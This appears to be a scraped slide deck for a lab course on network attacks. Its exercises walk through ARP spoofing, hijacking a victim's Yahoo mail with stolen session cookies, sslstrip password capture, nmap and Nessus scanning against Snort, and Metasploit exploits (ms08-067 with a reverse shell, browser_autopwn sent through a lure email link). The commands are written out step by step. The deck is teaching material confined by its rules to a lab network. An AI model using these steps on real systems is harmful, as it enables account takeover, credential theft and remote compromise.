Академический Документы
Профессиональный Документы
Культура Документы
Agenda
1. Interception of network traffic transmitted using a clear-text protocol (HTTP)
=> obtaining session cookies => using session cookies to enter a victims web session
2. 3. 4. 5. 6.
Scanning the Windows VM using nmap (+Snort disabled/enabled) Scanning the Windows VM using Nessus (+Snort disabled/enabled) Gaining access to the Windows VM by exploiting a network service vulnerability Gaining access to a Windows machine with a client-side attack:
=> social engineering => exploit browser vulnerability => use Metasploit to own the machine
Network Attacks
Rules
It is forbidden:
Any scanning / attack outside laboratory network Any scanning / attack against your colleagues machines or against instructors machine
Administrative tasks
Connect to ftp://stud@my.laptop.ip
username: stud password: stud
Download:
Course slides VMWare Player: VMware-player-3.1.3.exe Windows VM: winxpsp2_web_snort.zip Backtrack VM: bt4-final-vm.zip
Network Attacks
Network Attacks
Network Attacks
Exercise 1
Obtain the session cookies of a victim from the local network and use them to enter his Yahoo mail account
The victim needs a valid Yahoo mail account (a test account) The victim will open a web mail session The attacker
1. Becomes MITM 2. Captures network traffic of the victim and extracts the necessary data
Network Attacks 8
Exercise 1 cont.
Attacker machine: Become MITM and intercept all traffic sent by victim to the Gateway. View the traffic using Wireshark.
1. 2.
Find the IP addresses of Victim and Gateway Activate the routing process in Backtrack
echo 1 > /proc/sys/net/ipv4/ip_forward
3.
Inform the Victim that the Gateways MAC address is your MAC address attacker. (ARP poisoning using ARP replies)
arpspoof i eth0 t IP_Victim IP_Gateway
4.
Exercise 1 cont.
1. Find the session cookies of Victim and use them to enter his email session Wireshark -> Follow TCP stream on a TCP packet sent by Victim:
2. 3. 4. 5. 6.
Copy the cookies Y and T in a text file Install the Firefox plugin AddNEdit Cookies Open an Yahoo mail session of your own (attacker) Use the plugin to edit your cookies and replace Y and T with the ones of the Victim Refresh the web page
Network Attacks
10
Exercise 2
Intercept network traffic during a HTTPS session. Find the username and password of the Victim.
1. 2.
Make yourself MITM (see exercise 1) Start SSLSTRIP and make it listen on port 1234
sslstrip l 1234 s w traffic.log More details here: http://www.thoughtcrime.org/software/sslstrip/
3.
4. 5.
The victim accesses a web site using HTTPS (ex. Yahoo login) Extract the useful information from file traffic.log
Network Attacks
11
About Snort
http://www.snort.org/assets/166/snort_manual.pdf
Portable (Linux, Windows, MacOS X, Solaris, BSD, HP-UX, etc) Multiple mechanisms for intrusion detection
Signatures (rules): www.bleedingsnort.com Statistic anomalies Protocol anomalies
Network Attacks
12
Alerts/Logs
Network Attacks
13
Nmap briefings
TCP connect() scan: TCP SYN scan: TCP UDP scan: Ping scan: nmap sT <IP Address> nmap sS <IP Address> nmap sU <IP Address> nmap sP <IP Address>
TCP FIN / Xmas Tree / Null scan: nmap sF/sX/sN <IP Address> Version Detection: OS Fingerprinting: nmap sS -sV <IP Address> nmap sS -O <IP Address>
Change setup
Start the Windows VM New attack direction:
Backtrack Windows VM
Network Attacks
15
Exercise 3
Using nmap, scan the whole subnet of the victim machine (connected to vmnet8).
Obtain the following information (from a single scan): Live hosts Open TCP ports Service version Operating system - Save all output in a text file
Hints:
nmap h man nmap
Network Attacks
16
Exercise 3 cont.
Check if the scanning can be detected by a NIDS (Snort)
Authenticate to Windows VM (password: user) Start Snort
cmd.exe -> cd c:\snort\bin snort.exe d l ..\log c ..\etc\snort.conf A console
Perform the scanning again using Nmap Any alert? (see c:\Snort\log\alert.ids)
Network Attacks
17
Exercise 4
Scan the victim machine using Nessus to find vulnerabilities
1. First install Nessus on BackTrack: Download Nessus (for Ubuntu 9.10 32 bit) dpkg i Nessus-4.4.1-ubuntu910_i386.deb
http://www.tenable.com
2. Then obtain a Nessus activation code (Home Feed) http://www.tenable.com/products/nessus/nessus-plugins/register-a-homefeed 3. Configure Nessus server Add a Nessus user: /opt/nessus/sbin/nessus-adduser Register Nessus and update plugins: /opt/nessus/bin/nessus-fetch --register CODE Start Nessus server: /etc/init.d/nessusd start 4. Start Nessus client:
https://127.0.0.1:8834
Network Attacks 18
Exercise 4 cont.
Sample vulnerability:
1. 2. 3. 4.
Network Attacks
19
About Metasploit
Framework for writing and executing exploits Modules Exploits Auxiliary Payloads Encoders Nops User interfaces: - console: msfconsole - GUI: Updates: msfgui
Select Exploit -> Configure options + payload -> Run exploit -> Execute payload
Tutorial: http://www.offensive-security.com/metasploit-unleashed
Network Attacks 20
Exercise 5
We will use Metasploit to exploit vulnerability ms08-067 and gain remote access to Victim machine cd /pentest/exploits/framework3 ./msfconsole help search ms08-067 use exploit/windows/smb/ms08_067_netapi show options show payloads set RHOST, LHOST, PAYLOAD, TARGET = 3, etc (for payload use windows/shell/reverse_tcp) 8. exploit 9. Execute windows commands in the obtained shell (ex. ipconfig, hostname)
1. 2. 3. 4. 5. 6. 7. 8.
Network Attacks 21
Exercise 5 cont.
Obtain Remote Desktop access to Victim machine:
Add a new user:
What if?
Victim has all ports closed (firewall) Operating system is patched Answer: Attack client applications and plugins
(web browser, Acrobat Reader, MS Office, etc)
Network Attacks
23
Change setup
Start the firewall of Windows VM Disable any exceptions Use nmap to verify that there are no more open ports
Network Attacks
24
Exercise 6
Exploit browser vulnerability to gain remote acces. Use Metasploit and browser autopwn
1. 2. 3. 4. 5. 6. 7.
cd /pentest/exploits/framework3 ./msfconsole use auxiliary/server/browser_autopwn set LHOST 192.168.x.x (attacker IP) set SRVPORT 80 set URIPATH mypictures.html exploit
Network Attacks 25
Exercise 6 cont.
Send victim an email containing the link: http://192.168.x.x/mypictures.html Victim clicks the link Attacker obtains meterpreter session
Network Attacks
26
Network Attacks
27
Q&A
Network Attacks
28